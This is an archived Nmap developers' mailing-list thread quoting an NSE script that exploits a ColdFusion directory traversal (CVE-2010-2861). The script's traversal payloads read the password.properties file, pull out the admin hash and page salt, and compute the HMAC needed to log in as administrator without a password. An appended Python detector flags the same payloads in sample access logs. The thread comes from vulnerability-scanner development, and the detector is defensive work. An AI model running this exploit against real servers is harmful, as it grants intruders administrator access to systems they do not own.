Nmap Development mailing list archives

Re: NSE: http-vuln-cve2010-2861 submission for review


From: Patrik Karlsson <patrik () cqure net>
Date: Sun, 19 Feb 2012 15:42:31 +0100

On Fri, Feb 17, 2012 at 3:59 AM, Micah <micah.hoffman () gmail com> wrote:

This is a revision of an earlier NSE script I submitted. Thanks Patrik for
the assistance in cleaning it up and adding some features.

This NSE exploits a directory traversal in ColdFusion servers and grabs
password hashes. It then creates a SHA1 HMAC of that hash using a salt
embedded in the ColdFusion page. With this info, anyone can log into the
server as the administrator without any password guessing or cracking.

--- Micah


------
http-vuln-cve2010-2861

description = [[
This script will execute a directory traversal attack against a ColdFusion
server and try to grab the password hash for the administrator user. It
will then use the salt value (hidden in the web page) to create the SHA1
HMAC hash that the web server needs for authentication as admin. You can
pass this value to the ColdFusion server as the admin without cracking
the password hash.
]]

---
-- @usage
-- nmap --script http-vuln-cve2010-2861 <host>
--
-- @output
-- 80/tcp open  http
-- | http-vuln-cve2010-2861:
-- |   VULNERABLE:
-- |   Adobe ColdFusion enter.cfm Traversal password.properties Information Disclosure
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2010-2861  OSVDB:67047
-- |     Description:
-- |       Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion
-- |       9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter
-- |     Disclosure date: 2010-08-10
-- |     Extra information:
-- |
-- |   ColdFusion8
-- |   HMAC: d6914bef568f8931d0c696cd5f7748596f97db5d
-- |   Salt: 1329446896585
-- |   Hash: 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
-- |
-- |     References:
-- |       http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking
-- |       http://www.nessus.org/plugins/index.php?view=single&id=48340
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2861
-- |       http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861
-- |_      http://osvdb.org/67047
--
--
-- This script relies on the service being identified as HTTP or HTTPS. If the
-- ColdFusion server you run this against is on a port other than 80/tcp or 443/tcp
-- then use "nmap -sV" so that nmap discovers the port as an HTTP server.

author = "Micah Hoffman"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"intrusive", "vuln"}

require("http")
require("shortport")
require("stdnse")   -- needed for stdnse.tohex below
require("tab")
require("vulns")
require("openssl")

portrule = shortport.http

action = function(host, port)
  local vuln = {
    title = 'Adobe ColdFusion enter.cfm Traversal password.properties Information Disclosure',
    state = vulns.STATE.NOT_VULN, -- default
    IDS = {CVE = 'CVE-2010-2861', OSVDB = '67047'},
    description = [[
Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion
9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter]],
    references = {
      'http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking',
      'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2861',
      'http://osvdb.org/67047',
      'http://www.nessus.org/plugins/index.php?view=single&id=48340',
    },
    dates = {
      disclosure = {year = '2010', month = '08', day = '10'},
    },
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  -- Function to do the look up and return content
  local grabAndGrep = function(page)
    -- Do the HTTP GET request for the page
    local response = http.get(host, port, page)

    -- Check to see if we get a good page returned
    -- Is there no response?
    if ( not(response.status) ) then
      return false, "Received no response from HTTP server"
    end

    -- Is the response not an HTTP 200 code?
    if ( response.status ~= 200 ) then
      return false, ("The server returned an unexpected response (%d)"):format(response.status)
    end

    -- Now check the body for our strings
    if ( response.body ) then
      local saltcontent = response.body:match("salt.*value=\"(%d+)")
      -- Extra %x's needed or it will match strings that are not the long hex password
      local hashcontent = response.body:match("password=(%x%x%x%x+)")

      -- If a page has both the salt and the password in it then the exploit has been successful
      if ( saltcontent and hashcontent ) then
        vuln.state = vulns.STATE.VULN

        -- Generate HMAC as this is what the web application needs for authentication as admin
        local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent, hashcontent))
        return true, string.format("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s",
                                   hmaccontent, saltcontent, hashcontent)
      end
    end
    return false, "Not vulnerable"
  end

  -- One traversal path per known ColdFusion install layout. The %00 is a
  -- URL-encoded null byte sent as-is in the request; it is not a Lua escape.
  local exploits = {
    ['CFusionMX'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en',
    ['CFusionMX7'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en',
    ['ColdFusion8'] = '..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en',
    ['JRun4\\servers'] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en',
  }

  local results = tab.new(2)
  for prod, exploit in pairs(exploits) do
    local status, result = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
    -- Always report a hit; only report failures at verbosity 2 or higher
    if ( status or nmap.verbosity() > 1 ) then
      tab.addrow(results, prod, result)
    end
  end
  vuln.extra_info = "\n" .. tab.dump(results)

  return vuln_report:make_output(vuln)
end
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/


Thanks Micah! I ended up doing some minor changes before committing it as r28094.
Great work!
//Patrik
-- 
Patrik Karlsson
http://www.cqure.net
http://twitter.com/nevdull77
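Added here for the defender's side, not part of Micah's script or of Nmap: a Python check that runs over constructed web-server access-log lines and flags requests with the shape the script sends (the locale parameter of /CFIDE/administrator/enter.cfm carrying traversal sequences, a %00 null byte, or password.properties), rating a 200 response to such a request as a probable disclosure. The log lines, addresses and severity labels are constructed assumptions; both the URL-encoded and the raw-backslash form of the payload are covered.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format access-log lines (not real traffic).
# Line 1 carries the payload URL-encoded, line 3 carries it with the raw
# backslashes the NSE script sends; lines 2 and 4 are benign requests.
SAMPLE_LOG = r"""
10.0.0.5 - - [19/Feb/2012:15:42:31 +0100] "GET /CFIDE/administrator/enter.cfm?locale=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cColdFusion8%5clib%5cpassword.properties%00en HTTP/1.1" 200 4213 "-" "Mozilla/5.0"
10.0.0.6 - - [19/Feb/2012:15:43:02 +0100] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4213 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Feb/2012:15:44:10 +0100] "GET /CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en HTTP/1.1" 200 4213 "-" "Mozilla/5.0"
10.0.0.8 - - [19/Feb/2012:15:45:00 +0100] "GET /index.cfm HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
""".strip()

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
                    r'(?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')          # "..\" or "../"
ADMIN_PAGE = '/cfide/administrator/enter.cfm'

def analyze_line(line):
    """Return a finding dict for a CVE-2010-2861 style request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.lower().endswith(ADMIN_PAGE):
        return None
    # parse_qs decodes once; decode again so double-encoded payloads are seen too.
    locale = unquote(parse_qs(parts.query, keep_blank_values=True).get('locale', [''])[0])
    indicators = []
    if TRAVERSAL_RE.search(locale):
        indicators.append('traversal')
    if '\x00' in locale:
        indicators.append('null-byte')
    if 'password.properties' in locale.lower():
        indicators.append('password.properties')
    if not indicators:
        return None
    status = int(m.group('status'))
    # A 200 to a password.properties read means the file was most likely served.
    severity = 'probable-disclosure' if status == 200 and 'password.properties' in indicators else 'attempt'
    return {'src': m.group('src'), 'status': status, 'indicators': indicators,
            'severity': severity, 'locale': locale.replace('\x00', '\\x00')}

def scan_log(text):
    """Run analyze_line over every line and keep only the findings."""
    return [f for f in map(analyze_line, text.splitlines()) if f]
```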

